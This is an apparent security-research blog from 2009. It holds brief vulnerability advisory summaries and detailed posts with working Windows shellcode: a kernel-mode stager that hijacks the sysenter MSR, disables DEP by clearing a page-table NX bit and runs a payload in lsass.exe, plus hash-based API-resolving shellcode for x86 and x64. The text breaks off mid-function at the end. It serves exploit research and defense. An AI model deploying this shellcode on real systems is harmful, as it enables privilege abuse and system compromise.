Wednesday, 9 December 2009

HP Application Recovery Manager Stack Buffer Overflow Vulnerability

TippingPoint's Zero Day Initiative (ZDI) has published an advisory for a remote pre-authentication stack buffer overflow vulnerability in the Hewlett-Packard Application Recovery Manager which leads to arbitrary code execution. This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:
http://www.zerodayinitiative.com/advisories/ZDI-09-091/

And the HP advisory here:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909

Interestingly, HP reports this only as a remote Denial of Service vulnerability, while both ZDI and Harmony Security have confirmed it as a remote code execution vulnerability.

Monday, 23 November 2009

HP Operations Manager Backdoor Account Code Execution Vulnerability

TippingPoint's Zero Day Initiative (ZDI) has published an advisory for a remote SYSTEM code execution vulnerability in the Hewlett-Packard Operations Manager Server for Windows, due principally to the presence of a hidden user account in the server's Apache Tomcat installation. Code execution is achieved via an arbitrary file upload using the credentials of the hidden user account. This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:
http://www.zerodayinitiative.com/advisories/ZDI-09-085/

Thursday, 5 November 2009

Implementing a Win32 Kernel Shellcode

Introduction

This blog post discusses the implementation of a Win32 kernel mode shellcode which delivers an independent user mode payload. Most of the techniques used in this shellcode are discussed in the excellent 2005 paper 'Kernel-mode Payloads on Windows' by bugcheck and skape. The shellcode works against all current Windows kernels, and we will see how several assumptions regarding memory locations can be made in order both to store the kernel mode shellcode and to disable DEP for the user mode portions.

The shellcode will work as follows. After gaining arbitrary code execution we will initially migrate out of the current kernel thread we are executing in by hijacking the sysenter Model Specific Register (MSR). Now whenever a user mode process performs a system call via the sysenter instruction, our kernel mode stager will get control. This stager will determine if it should hijack the user mode thread's return address for the system call. If it does, our user mode stager will get control and determine if it is executing in a predetermined SYSTEM process. If it is, the kernel mode sysenter hook is removed before finally executing the user mode payload. Should the user mode payload return cleanly, the hijacked user mode thread may resume execution normally.

Kernel Mode Migration

For our shellcode to work correctly we make several decisions as to where the shellcode will be placed in memory. From within kernel mode we will place our shellcode beginning at address 0xFFDF0400, which resides within the kernel's Hardware Abstraction Layer (HAL) memory region. This memory is both writable and executable. It has the extra property of being mapped into the shared user data region (with a WinDbg symbol of SharedUserData, beginning at address 0x7FFE0000) of all user mode processes, and as such can also be addressed from user mode using the address 0x7FFE0400 (we advance 0x400 bytes past the beginning of SharedUserData to avoid overwriting the critical information held there). From user mode on a Physical Address Extension (PAE) enabled system this memory will have the NX bit set, marking it not executable, as shown below in Listing 1. However, we can easily overcome this in our kernel mode stager as described later. These addresses are not affected by ASLR and are static across all current versions of Windows.

kd> !pte 0xFFDF0400
VA ffdf0400
PDE at 00000000C0603FF0 PTE at 00000000C07FEF80
contains 0000000000127063 contains 0000000000152163
pfn 127 ---DA--KWEV pfn 152 -G-DA--KWEV <- Executable bit is set
kd> !pte 0x7FFE0400
VA 7ffe0400
PDE at 00000000C0601FF8 PTE at 00000000C03FFF00
contains 000000003D283867 contains 8000000000152005
pfn 3d283 ---DA--UWEV pfn 152 -------UR-V <- Executable bit is not set

To hijack the sysenter MSR as shown below in Listing 2, we first read the value of the current sysenter MSR and save it to a known location so that we can restore it later. As we already know where we will place our kernel mode stager, we proceed to set this address as the new sysenter MSR. We then copy our kernel mode stager and user mode stager over to this known location (0xFFDF0400). Finally we place the current kernel thread we are in into a halted state, to avoid any stability issues that could arise should we instead attempt either to kill the thread or to resume the thread's execution.

ring0_migrate_start:
cld
cli
jmp short ring0_migrate_bounce
ring0_migrate_patch:
pop esi // pop off ring0_stager_start address
// get current sysenter msr (nt!KiFastCallEntry)
push 0x176 // SYSENTER_EIP_MSR
pop ecx
rdmsr
// save original sysenter msr (nt!KiFastCallEntry)
mov dword [esi+( ring0_stager_data - ring0_stager_start )+0], eax
// retrieve the address in kernel memory where we will write the ring0 stager + ring3 code
mov edi, dword [esi+( ring0_stager_data - ring0_stager_start )+4]
// patch sysenter msr to be our stager
mov eax, edi
wrmsr
// copy over stager to shared memory
mov ecx, ( ring3_stager - ring0_stager_start )
rep movsb
sti // set interrupt flag
ring0_migrate_idle:
hlt // Halt this thread to avoid problems.
jmp short ring0_migrate_idle
ring0_migrate_bounce:
call ring0_migrate_patch // call the patch code, pushing the ring0_stager_start address to stack

Kernel Mode Staging

With both our kernel mode and user mode stagers resident in memory and the sysenter MSR hijacked, our kernel mode stager will get control whenever any user mode process issues a sysenter instruction. The kernel mode stager, shown below in Listing 3, acts as a proxy to the real sysenter function (nt!KiFastCallEntry): it first preserves the state of the CPU, performs its actions, then restores the state of the CPU and returns into the original sysenter function.

The kernel mode stager first checks whether the user mode process which issued the system call is instructing the stager to remove the sysenter MSR hook. The user mode stager, described later, will use this feature before executing the user mode payload. If the sysenter MSR hook is to be removed, the address of the original sysenter function is restored to the correct MSR before the kernel mode stager returns.

If the hook is not to be removed, the kernel mode stager will determine if the return address for the user mode thread that issued the sysenter is to be patched in order to execute the user mode stager. It does this by examining whether the user mode return address from the system call points to a single RET instruction (as opposed to a 'RET 4', a 'RET 8' or any other instruction). This is to ensure that the user mode stager can resume the hijacked user mode thread correctly if the user mode stager chooses not to execute the user mode payload (e.g. when not running in a SYSTEM process). This works because the user mode stager will also perform a single RET instruction when it is finished. If the kernel mode stager is to hijack the user mode return address, the address of the user mode stager is patched over the original return address held on the user mode thread's stack (pointed to by EDX during a sysenter).

Finally we must bypass DEP if we are running on a PAE enabled system so that the user mode stager can execute correctly. We can use the CPUID instruction to determine if the current CPU supports the NX bit. If it does, we clear the NX bit from the Page Table Entry (PTE) which is associated with the user mode stager. Windows does not use any form of ASLR for the base of either its Page Directories or Page Tables, which begin at 0xC0600000 and 0xC0000000 respectively on PAE enabled systems (refer to page 771 of 'Windows Internals, Fifth Edition' by Mark Russinovich, David Solomon and Alex Ionescu). Knowing the address of the user mode stager (0x7FFE0400 + the length of the kernel mode stager), we can therefore determine the static address for the corresponding PTE. Each PAE PTE is 8 bytes wide and maps one 4 KB page, so the PTE lives at 0xC0000000 + (0x7FFE0400 >> 12) * 8, which is 0xC03FFF00. By clearing the NX bit (bit 63) in this PTE we can disable DEP protection for the user mode stager.

ring0_stager_start:
push byte 0 // alloc a dword for the patched return address
pushfd // save flags and registers
pushad
call ring0_stager_eip
ring0_stager_eip:
pop eax
// patch in the real nt!KiFastCallEntry address as our return address
mov ebx, dword [eax + ( ring0_stager_data - ring0_stager_eip ) + 0]
mov [ esp + 36 ], ebx
cmp ecx, 0xDEADC0DE // see if we should remove sysenter hook
jne ring0_stager_hook
push 0x176 // SYSENTER_EIP_MSR
pop ecx
mov eax, ebx // set sysenter msr to be the real nt!KiFastCallEntry
xor edx, edx
wrmsr
xor eax, eax // clear eax (the syscall number) so we can continue
jmp short ring0_stager_finish
ring0_stager_hook: // get the original r3 ret address
mov esi, [ edx ] // (edx is the ring3 stack pointer)
movzx ebx, byte [ esi ] // determine if the return is to a "ret"
cmp bx, 0xC3
// only insert ring3 stager hook if we are to return to a single ret
jne short ring0_stager_finish
// calculate our r3 address in shared memory
mov ebx, dword [eax + ( ring0_stager_data - ring0_stager_eip ) + 8]
lea ebx, [ ebx + ring3_start - ring0_stager_start ]
mov [ edx ], ebx // patch in our r3 stage as the r3 return address
mov eax, 0x80000001
cpuid // detect if NX is present (clobbers eax,ebx,ecx,edx)...
and edx, 0x00100000 // bit 20 is the NX bit
jz short ring0_stager_finish
// modify the correct PTE to make our ring3 stager executable
mov edx, 0xC03FFF00 // we can default to this for now
add edx, 4
and dword [ edx ], 0x7FFFFFFF // clear the NX bit
ring0_stager_finish:
popad // restore registers
popfd // restore flags
ret // return to real nt!KiFastCallEntry
ring0_stager_data:
dd 0xFFFFFFFF // saved nt!KiFastCallEntry
dd 0xFFDF0400 // kernel memory address of stager
dd 0x7FFE0400 // shared user memory address of stager
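
The static PTE address used in the listing above can be checked with a little arithmetic. The following Python sketch is for illustration only and is not part of the shellcode. The function names are hypothetical, and it assumes the PAE layout described above (8 byte entries, 4 KB pages, page tables at 0xC0000000 and page directories at 0xC0600000).

```python
PTE_BASE = 0xC0000000    # base of the page tables on PAE systems (from the text)
PDE_BASE = 0xC0600000    # base of the page directories on PAE systems (from the text)
ENTRY_SIZE = 8           # PAE entries are 64 bits wide
NX_BIT = 1 << 63         # bit 63 of the entry, i.e. bit 31 of its upper dword


def pte_address(va):
    """Virtual address of the PTE that maps the 4 KB page containing va."""
    return PTE_BASE + (va >> 12) * ENTRY_SIZE


def pde_address(va):
    """Virtual address of the PDE that covers the 2 MB region containing va."""
    return PDE_BASE + (va >> 21) * ENTRY_SIZE


def clear_nx(entry):
    """Return the 64-bit entry value with the NX bit cleared."""
    return entry & ~NX_BIT & 0xFFFFFFFFFFFFFFFF


if __name__ == "__main__":
    for va in (0xFFDF0400, 0x7FFE0400):
        print("VA %08X  PDE at %08X  PTE at %08X"
              % (va, pde_address(va), pte_address(va)))
    print("PTE value with NX cleared: %016X" % clear_nx(0x8000000000152005))
```

Here pte_address(0x7FFE0400) gives 0xC03FFF00 and pte_address(0xFFDF0400) gives 0xC07FEF80, matching the !pte output shown earlier. Because the NX bit is bit 63 of the 64-bit entry, the stager adds 4 to the PTE address and clears bit 31 of the upper dword.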

User Mode Staging

We now have our user mode stager executing in every thread in the system that issues a system call which returns to a single RET instruction. We examine the file path held in the Process Environment Block (PEB) of the current process to see if we are executing in a process which should be running with SYSTEM privileges. If we are not running in such a process, the user mode stager will simply return, resuming the current thread's execution correctly. If we are executing in a privileged process, we proceed to issue a special system call in order to instruct the kernel mode stager to remove the sysenter hook. We then execute the user mode payload.

ring3_start:
pushad
push byte 0x30
pop eax
cdq // zero edx
mov ebx, [ fs : eax ] // get the PEB
cmp [ ebx + 0xC ], edx
jz ring3_finish
mov eax, [ ebx + 0x10 ] // get pointer to the ProcessParameters
mov eax, [ eax + 0x3C ] // get the current process's ImagePathName
// advance past '*:\windows\system32\'
add eax, byte 0x28 // (we assume this as we want a system process).
// compute a simple hash of the name (skape's technique).
mov ecx, [ eax ] // get first 2 wide chars of name 'l\x00s\x00'
add ecx, [ eax + 0x3 ] // and add '\x00a\x00s'
cmp ecx, 'lass' // check the hash, default to hash('lsass.exe')
// if we are not in the correct process, return to real caller.
jne ring3_finish
// otherwise we first remove our ring0 sysenter hook.
call ring3_cleanup
// and then call the real ring3 payload.
call ring3_stager
// should the payload return we can resume this thread correctly.
jmp ring3_finish
ring3_cleanup:
mov ecx, 0xDEADC0DE // set the magic value for ecx
mov edx, esp // save our esp in edx for sysenter
sysenter // now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller).
ring3_finish:
popad
ret // return to the original system calls caller
ring3_stager:
// ...ring3 payload here...
ret

Mitigations

Several mitigations could be made in the kernel to make this type of shellcode unviable, although once arbitrary code execution has been gained, mitigations usually act more as an obstacle than as a true preventative.

  • Both the Page Directories and Page Tables could have some form of ASLR employed so that determining Page Table Entries would be non-trivial. This would help ensure DEP could not be circumvented when running the user mode stager. However, as the physical address of the page directory is held in the CR3 register, it should be possible to resolve it to a virtual address programmatically.
  • The kernel mode mapping of SharedUserData could be marked as not executable, removing the location where the kernel stager goes resident. However, the respective PTE could still be modified to overcome this. Furthermore, the entire HAL memory region should be subject to ASLR so that predetermined addresses cannot be chosen by the attacker.
  • The kernel mode mapping of SharedUserData need not be mapped across all process address spaces. Instead, a separate user mode only mapping could be present for each process's SharedUserData region and mapped back into kernel memory only if needed. This could prevent the user mode stager from being 'injected' into each user mode process.

Download

http://www.harmonysecurity.com/files/win32_kernel_shellcode.asm

Thursday, 29 October 2009

EMC & OpenText Hummingbird STR Service Stack Overflow Vulnerability

TippingPoint's Zero Day Initiative (ZDI) has published an advisory for a remote pre-authentication stack buffer overflow vulnerability that leads to SYSTEM code execution in the Hummingbird STR Service. The vulnerable service is deployed by multiple vendor products, specifically EMC Documentum eRoom, OpenText Hummingbird and OpenText Search Server. This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:
http://www.zerodayinitiative.com/advisories/ZDI-09-074/

Wednesday, 23 September 2009

Adobe RoboHelp Server Arbitrary File Upload and Execute Vulnerability

TippingPoint's Zero Day Initiative (ZDI) has published an advisory for an arbitrary file upload vulnerability that leads to SYSTEM code execution in the Adobe RoboHelp Server. This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:
http://www.zerodayinitiative.com/advisories/ZDI-09-066/

And the Adobe advisory here:
http://www.adobe.com/support/security/bulletins/apsb09-14.html

Wednesday, 5 August 2009

Calling API Functions

Introduction

An alternative approach for position independent code, such as shellcode, to call Windows API functions is shown below. There are already many existing methods available, typically relying on parsing either the Import Address Table (IAT) or Export Address Table (EAT) of a specific module in order to locate the address of a required function. Some methods use a variation of the above where the kernel32 module's EAT (or a module's IAT entry referencing kernel32) is parsed in order to locate the functions LoadLibraryA and GetProcAddress, and these two functions are then used to resolve the remaining function addresses (as well as loading in any modules not already present in the process's address space). If relying on GetProcAddress to resolve functions, the ASCII names of the functions must also be available, increasing the shellcode's size considerably. It is therefore common to use a hashing technique, typically based on the assembly rotate (ROR/ROL) instructions, in order to avoid this problem and create a more optimized solution.

The 2003 paper 'Understanding Windows Shellcode' by Skape[1] is an excellent read to understand the various techniques fully. A good example of a well optimized shellcode is SkyLined's w32-bind-ngs-shellcode[2].

An Alternative Approach

Another way to resolve function addresses is to use a hash that combines both the desired function name and its module name. The entire list of modules loaded in a process can be iterated over, calculating the respective hash value for each exported function and comparing it to the hash we are searching for. Once located, we can proceed to resolve the function's address. Furthermore, we can wrap this functionality in a function which acts as a proxy, allowing the caller to indirectly call the desired API function. A pseudo x86 code example of using this technique is shown first below, followed for comparison by a more traditional approach to achieving the same result.

Using api_call:

push param2 // push the second parameter
push param1 // push the first parameter
push hash // push the hash of the function+module
call api_call // resolve and indirectly call the desired function

Traditional approach:

push hash // push the hash of the function + module
push module_address // push the address of the module
call resolve_api_address // resolve the desired function
push param2 // push the second parameter
push param1 // push the first parameter
call api_address // directly call the desired function

We can see from the above that there are some advantages, namely that it takes only one call to both resolve and call any API function. We also do not need to keep track of any modules' base addresses.

All the source code shown below can be downloaded from this zip file CallingAPIFunctions.zip. Also included in the zip are the x86 and x64 versions of the eggtest application used to run and aid debugging of shellcode.

Implementation - Win32 x86

Listed below is a 137 byte implementation of the technique described above. This implementation works on all versions of 32-bit Windows (Windows 7, 2008, Vista, 2003, XP, 2000, NT4). It is implemented as a function called 'api_call'. Its parameters are the hash value of the desired API function to call, followed by all of the desired API function's parameters. It returns the result of indirectly calling the desired API function. The stdcall calling convention (used by all Win32 API functions) is honored in that the EAX, ECX and EDX registers are expected to be clobbered while the remaining registers are preserved.

[BITS 32]

api_call:
pushad // We preserve all the registers for the caller, bar EAX, ECX and EDX.
mov ebp, esp // Create a new stack frame
xor edx, edx // Zero EDX
mov edx, [fs:edx+48] // Get a pointer to the PEB
mov edx, [edx+12] // Get PEB->Ldr
mov edx, [edx+20] // Get the first module from the InMemoryOrder module list
next_mod:
mov esi, [edx+40] // Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] // Set ECX to the length we want to check
xor edi, edi // Clear EDI which will store the hash of the module name
loop_modname:
xor eax, eax // Clear EAX
lodsb // Read in the next byte of the name
cmp al, 'a' // Some versions of Windows use lower case module names
jl not_lowercase
sub al, 0x20 // If so normalise to uppercase
not_lowercase:
ror edi, 13 // Rotate right our hash value
add edi, eax // Add the next byte of the name
loop loop_modname // Loop until we have read enough
// We now have the module hash computed
push edx // Save the current position in the module list for later
push edi // Save the current module hash for later
// Proceed to iterate the export address table,
mov edx, [edx+16] // Get this modules base address
mov eax, [edx+60] // Get PE header
add eax, edx // Add the modules base address
mov eax, [eax+120] // Get export tables RVA
test eax, eax // Test if no export address table is present
jz get_next_mod1 // If no EAT present, process the next module
add eax, edx // Add the modules base address
push eax // Save the current modules EAT
mov ecx, [eax+24] // Get the number of function names
mov ebx, [eax+32] // Get the rva of the function names
add ebx, edx // Add the modules base address
// Computing the module hash + function hash
get_next_func:
jecxz get_next_mod // When we reach the start of the EAT (we search backwards), process the next module
dec ecx // Decrement the function name counter
mov esi, [ebx+ecx*4] // Get rva of next function name
add esi, edx // Add the modules base address
xor edi, edi // Clear EDI which will store the hash of the function name
// And compare it to the one we want
loop_funcname:
xor eax, eax // Clear EAX
lodsb // Read in the next byte of the ASCII function name
ror edi, 13 // Rotate right our hash value
add edi, eax // Add the next byte of the name
cmp al, ah // Compare AL (the next byte from the name) to AH (null)
jne loop_funcname // If we have not reached the null terminator, continue
add edi, [ebp-8] // Add the current module hash to the function hash
cmp edi, [ebp+36] // Compare the hash to the one we are searching for
jnz get_next_func // Go compute the next function hash if we have not found it
// If found, fix up the stack and call the function, else compute the next one...
pop eax // Restore the current modules EAT
mov ebx, [eax+36] // Get the ordinal table rva
add ebx, edx // Add the modules base address
mov cx, [ebx+2*ecx] // Get the desired functions ordinal
mov ebx, [eax+28] // Get the function addresses table rva
add ebx, edx // Add the modules base address
mov eax, [ebx+4*ecx] // Get the desired functions RVA
add eax, edx // Add the modules base address to get the functions actual VA
// We now fix up the stack and perform the call to the desired function...
finish:
mov [esp+36], eax // Overwrite the old EAX value with the desired api address for the upcoming popad
pop ebx // Clear off the current modules hash
pop ebx // Clear off the current position in the module list
popad // Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
pop ecx // Pop off the original return address our caller will have pushed
pop edx // Pop off the hash value our caller will have pushed
push ecx // Push back the correct return address
jmp eax // Jump into the required function
// We now automagically return to the correct caller...
get_next_mod:
pop eax // Pop off the current (now the previous) modules EAT
get_next_mod1:
pop edi // Pop off the current (now the previous) modules hash
pop edx // Restore our position in the module list
mov edx, [edx] // Get the next module
jmp short next_mod // Process this module
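
The hash values pushed by a caller of api_call have to be generated ahead of time. Below is a minimal Python sketch of how this might be done by mirroring the listing above. It is not the author's tooling, and the function names are our own for illustration. It assumes the module name is hashed as an upper case UTF-16LE string including its null terminator (the listing takes its length from the word at offset 38 of the list entry, which we read as the MaximumLength of the module's base name), and that the function name is hashed as ASCII, also including its null terminator.

```python
def ror32(value, bits):
    """Rotate a 32-bit value right by the given number of bits."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def ror13_hash(data):
    """Apply 'ror 13' followed by 'add byte' for every byte, as in the listing."""
    h = 0
    for byte in data:
        h = ror32(h, 13)
        h = (h + byte) & 0xFFFFFFFF
    return h


def module_hash(name):
    # Assumption: upper case UTF-16LE name plus its terminating null.
    return ror13_hash((name.upper() + "\x00").encode("utf-16-le"))


def function_hash(name):
    # The listing's loop also processes the null terminator of the ASCII name.
    return ror13_hash(name.encode("ascii") + b"\x00")


def api_hash(module, function):
    """Combined hash: module hash plus function hash, truncated to 32 bits."""
    return (module_hash(module) + function_hash(function)) & 0xFFFFFFFF


if __name__ == "__main__":
    print("0x%08X" % api_hash("kernel32.dll", "WinExec"))
```

If the sketch mirrors the listing faithfully, api_hash('kernel32.dll', 'WinExec') should reproduce the 0x876F8B31 value used in the example that follows. One small difference to be aware of: the assembly subtracts 0x20 from every byte greater than or equal to 'a', whereas upper() only changes letters. For ordinary module names the two agree.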


Example - Win32 x86

Using the implementation given above (and assuming it has been saved to a file called 'x86_api_call.asm'), we can build a simple example which will execute the calc program and then terminate the process.

[BITS 32]
[ORG 0]

cld // clear the direction flag
call start // call start, this pushes the address of 'api_call' onto the stack
delta:
%include "./x86_api_call.asm"
start:
pop ebp // pop off the address of 'api_call' for calling later

push byte +1 // push the command show parameter
lea eax, [ebp+command-delta] // calculate an address to the command line
push eax // push the command line parameter
push 0x876F8B31 // push the hash value for WinExec
call ebp // kernel32.dll!WinExec( &command, SW_NORMAL )

push byte 0 // push the desired exit code parameter
push 0x56A2B5F0 // push the hash value for ExitProcess
call ebp // call kernel32.dll!ExitProcess( 0 )

command:
db "calc.exe", 0


We can build the above example using the NASM assembler[4] with the command:
>nasm -f bin -O3 -o x86_example.bin x86_example.asm
We can run the example with the eggtest (included in zip file) program:
>eggtest_x86.exe x86_example.bin

Implementation - Win64 x64

We can of course use the same technique on 64-bit Windows. Listed below is a 192 byte implementation of the technique described above for the x64 architecture. As before, it is implemented as a function called 'api_call'. The Win64 API uses quite a different calling convention[3] to that of the Win32 API. The first four parameters to any function are passed in via the registers RCX, RDX, R8 and R9 respectively, with any remaining parameters being pushed onto the stack (there are exceptions to this convention for floating point parameters). Another notable difference when coding for Win64 is that the Process Environment Block (PEB) must be retrieved from gs:96 as opposed to fs:48 on Win32. The desired function's hash value is passed in via register R10 in order to allow the registers RCX, RDX, R8 and R9 to be used for the desired function's parameters. We can note that the hash values used do not need to be changed between architectures.

[BITS 64]

api_call:
push r9 // Save the 4th parameter
push r8 // Save the 3rd parameter
push rdx // Save the 2nd parameter
push rcx // Save the 1st parameter
push rsi // Save RSI
xor rdx, rdx // Zero rdx
mov rdx, [gs:rdx+96] // Get a pointer to the PEB
mov rdx, [rdx+24] // Get PEB->Ldr
mov rdx, [rdx+32] // Get the first module from the InMemoryOrder module list
next_mod:
mov rsi, [rdx+80] // Get pointer to modules name (unicode string)
movzx rcx, word [rdx+74] // Set rcx to the length we want to check
xor r9, r9 // Clear r9 which will store the hash of the module name
loop_modname:
xor rax, rax // Clear rax
lodsb // Read in the next byte of the name
cmp al, 'a' // Some versions of Windows use lower case module names
jl not_lowercase
sub al, 0x20 // If so normalise to uppercase
not_lowercase:
ror r9d, 13 // Rotate right our hash value
add r9d, eax // Add the next byte of the name
loop loop_modname // Loop until we have read enough
// We now have the module hash computed
push rdx // Save the current position in the module list for later
push r9 // Save the current module hash for later
// Proceed to iterate the export address table,
mov rdx, [rdx+32] // Get this modules base address
mov eax, dword [rdx+60] // Get PE header
add rax, rdx // Add the modules base address
mov eax, dword [rax+136] // Get export tables RVA
test rax, rax // Test if no export address table is present
jz get_next_mod1 // If no EAT present, process the next module
add rax, rdx // Add the modules base address
push rax // Save the current modules EAT
mov ecx, dword [rax+24] // Get the number of function names
mov r8d, dword [rax+32] // Get the rva of the function names
add r8, rdx // Add the modules base address
// Computing the module hash + function hash
get_next_func:
jrcxz get_next_mod // When we reach the start of the EAT (we search backwards), process the next module
dec rcx // Decrement the function name counter
mov esi, dword [r8+rcx*4] // Get rva of next function name
add rsi, rdx // Add the modules base address
xor r9, r9 // Clear r9 which will store the hash of the function name
// And compare it to the one we want
loop_funcname:
xor rax, rax // Clear rax
lodsb // Read in the next byte of the ASCII function name
ror r9d, 13 // Rotate right our hash value
add r9d, eax // Add the next byte of the name
cmp al, ah // Compare AL (the next byte from the name) to AH (null)
jne loop_funcname // If we have not reached the null terminator, continue
add r9, [rsp+8] // Add the current module hash to the function hash
cmp r9d, r10d // Compare the hash to the one we are searching for
jnz get_next_func // Go compute the next function hash if we have not found it
// If found, fix up the stack and call the function, else compute the next one...
pop rax // Restore the current modules EAT
mov r8d, dword [rax+36] // Get the ordinal table rva
add r8, rdx // Add the modules base address
mov cx, [r8+2*rcx] // Get the desired functions ordinal
mov r8d, dword [rax+28] // Get the function addresses table rva
add r8, rdx // Add the modules base address
mov eax, dword [r8+4*rcx] // Get the desired functions RVA
add rax, rdx // Add the modules base address to get the functions actual VA
// We now fix up the stack and perform the call to the desired function...
finish:
pop r8 // Clear off the current modules hash
pop r8 // Clear off the current position in the module list
pop rsi // Restore RSI
pop rcx // Restore the 1st parameter
pop rdx // Restore the 2nd parameter
pop r8 // Restore the 3rd parameter
pop r9 // Restore the 4th parameter
pop r10 // pop off the return address
sub rsp, 32 // reserve space for the four register params (4 * sizeof(QWORD) = 32)
// It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
push r10 // push back the return address
jmp rax // Jump into the required function
// We now automagically return to the correct caller...
get_next_mod: //
pop rax // Pop off the current (now the previous) modules EAT
get_next_mod1:
pop r9 // Pop off the current (now the previous) modules hash
pop rdx // Restore our position in the module list
mov rdx, [rdx] // Get the next module
jmp next_mod // Process this module


Example - Win64 x64

Using the x64 implementation given above (and assuming it has been saved to a file called 'x64_api_call.asm'), we can build another simple example which will execute the calc program and then terminate the process.

[BITS 64]
[ORG 0]

cld // clear the direction flag
and rsp, 0xFFFFFFFFFFFFFFF0 // Ensure RSP is 16 byte aligned
call start // call start, this pushes the address of 'api_call' onto the stack
delta:
%include "./x64_api_call.asm"
start:
pop rbp // pop off the address of 'api_call' for calling later

mov rdx, 1 // param 2 is the command show parameter
lea rcx, [rbp+command-delta] // param 1 is the address to the command line
mov r10d, 0x876F8B31 // R10 = the hash value for WinExec
call rbp // WinExec( &command, 1 );

mov rcx, 0 // set the exit function parameter
mov r10d, 0x6F721347 // R10 = the hash value for RtlExitUserThread
call rbp // call ntdll.dll!RtlExitUserThread( 0 )

command:
db "calc.exe", 0


We can build the above example using the NASM assembler with the command:
>nasm -f bin -O3 -o x64_example.bin x64_example.asm
We can run the example with the eggtest (included in zip file) program:
>eggtest_x64.exe x64_example.bin

Forwarded Exports

Modules may contain entries in their EAT which are actually forwarded entries[5]. This means that instead of a module's export resolving to a function within that module, the export is intended to resolve to a function within another module. For example, on Windows Vista, 2008 and 7 the export kernel32.dll!ExitThread is a forwarded export that points to ntdll.dll!RtlExitUserThread. This is achieved by having the respective EAT entry refer, not to code, but to an ASCII string inside the export directory which names the module and function that the forwarded export wishes to point to. I am unaware of any shellcode implementations that attempt to resolve forwarded exports correctly (unless using kernel32.dll!GetProcAddress), and the implementation given above does not resolve forwarded exports either. It gets awkward quickly, as you must first recognize that the export is a forwarded one, then use LoadLibraryA to load the forwarded module (in order to retrieve its base address, and to load it into the process's address space if it is not already present), and then use GetProcAddress to resolve the forwarded function based on the ASCII function name given.
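
To make the first of those steps concrete, here is a rough sketch in Python (chosen for readability, with hypothetical function names). It relies on the usual PE convention that an export is a forwarder when its RVA falls inside the export directory itself, where it points to a string such as 'NTDLL.RtlExitUserThread'. The export directory's RVA and size are assumed to have been read from the module's PE data directory beforehand.

```python
def is_forwarded_export(func_rva, export_dir_rva, export_dir_size):
    """An export whose RVA lies within the export directory is a forwarder."""
    return export_dir_rva <= func_rva < export_dir_rva + export_dir_size


def parse_forwarder(forwarder):
    """Split a forwarder string such as 'NTDLL.RtlExitUserThread'.

    The split is made on the last dot so that everything before it is
    treated as the target module name.
    """
    module, _, function = forwarder.rpartition(".")
    return module, function


if __name__ == "__main__":
    # Illustrative numbers only, not taken from a real module.
    print(is_forwarded_export(0x1500, 0x1000, 0x800))
    print(parse_forwarder("NTDLL.RtlExitUserThread"))
```

Resolving the forwarder would still require loading the named module and looking the function up by name, which is the awkward part described above.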

For typical shellcodes the only function required which is a forwarded export is ExitThread as mentioned above. A workaround for this problem is to check at run time the current Windows platform and call the appropriate function to avoid calling a forwarded export as shown in the Win32 snippet below:

exitfunk:
mov ebx, 0x0A2A1DE0 // The EXITFUNK as patched in by the user...
push 0x9DBD95A6 // hash( "kernel32.dll", "GetVersion" )
call ebp // GetVersion(); (AL will = major version and AH will = minor version)
cmp al, byte 6 // If we are not running on Windows Vista, 2008 or 7
jl short goodbye // Then just call the exit function...
cmp bl, 0xE0 // If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne short goodbye
mov ebx, 0x6F721347 // Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
goodbye: // We now perform the actual call to the exit function
push byte 0 // push the exit function parameter
push ebx // push the hash of the exit function
call ebp // call EXITFUNK( 0 );
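
The decision made by the snippet above can be modelled in a few lines of Python. This is only a sketch of the logic, not a replacement for the assembly: the two hash constants are taken from the snippet, while the function name and the sample version values are assumptions made for illustration.

```python
EXITTHREAD_HASH = 0x0A2A1DE0         # EXITFUNK value patched in by the user
RTLEXITUSERTHREAD_HASH = 0x6F721347  # ntdll.dll!RtlExitUserThread


def select_exit_hash(exitfunk, version):
    """Mirror the checks in the snippet: GetVersion() returns the major
    version in the low byte (AL), and only the low byte of EXITFUNK (BL)
    is compared against 0xE0."""
    major = version & 0xFF
    if major >= 6 and (exitfunk & 0xFF) == 0xE0:
        return RTLEXITUSERTHREAD_HASH
    return exitfunk


# Sample GetVersion() values: low byte is the major version, next byte the minor.
print(hex(select_exit_hash(EXITTHREAD_HASH, 0x0106)))  # major 6, minor 1
print(hex(select_exit_hash(EXITTHREAD_HASH, 0x0105)))  # major 5, minor 1
```

Note that because only the low byte is compared, any other EXITFUNK hash ending in 0xE0 would also be substituted on version 6 and later.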


Hash Collisions

An obvious concern when using hash values in the manner described here is the occurrence of collisions between the hash of the function you are searching for and an arbitrary function in an arbitrary module which computes to the same hash value. To help determine the likelihood of this, a simple python script can be used to scan all modules on a system, computing the hashes of their exported functions and detecting if a collision occurs against any predefined functions (e.g. common functions we might need to use such as kernel32.dll!WinExec or ws2_32!recv). The python script is included in the zip file (see start of this post) and uses the pefile package[6] to process a module's exports. This script has been run on multiple systems (Windows 7 RC1, 2008 SP1, Vista SP2, 2003 SP2, XP SP3, 2000 SP4 and NT4 SP6a), processing a total of 1,864,417 functions across 35,178 modules, and detected no collisions against the functions defined (please see the python script for more details).
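
The core of such a scan can be sketched as follows. This is not the script from the zip file: it takes an already extracted list of (module, function) pairs instead of using pefile, and example_hash is a stand-in ROR-13 style hash rather than the exact hash used by the shellcode. All names here are hypothetical.

```python
def ror13(value):
    """Rotate a 32-bit value right by 13 bits."""
    return ((value >> 13) | (value << 19)) & 0xFFFFFFFF


def example_hash(module, function):
    """Stand-in hash: ROR-13 over the uppercased module name followed by
    the function name (an assumption, not the post's exact algorithm)."""
    h = 0
    for b in module.upper().encode("ascii") + function.encode("ascii"):
        h = (ror13(h) + b) & 0xFFFFFFFF
    return h


def find_collisions(exports, targets, hash_fn=example_hash):
    """Report every export whose hash equals that of a different target."""
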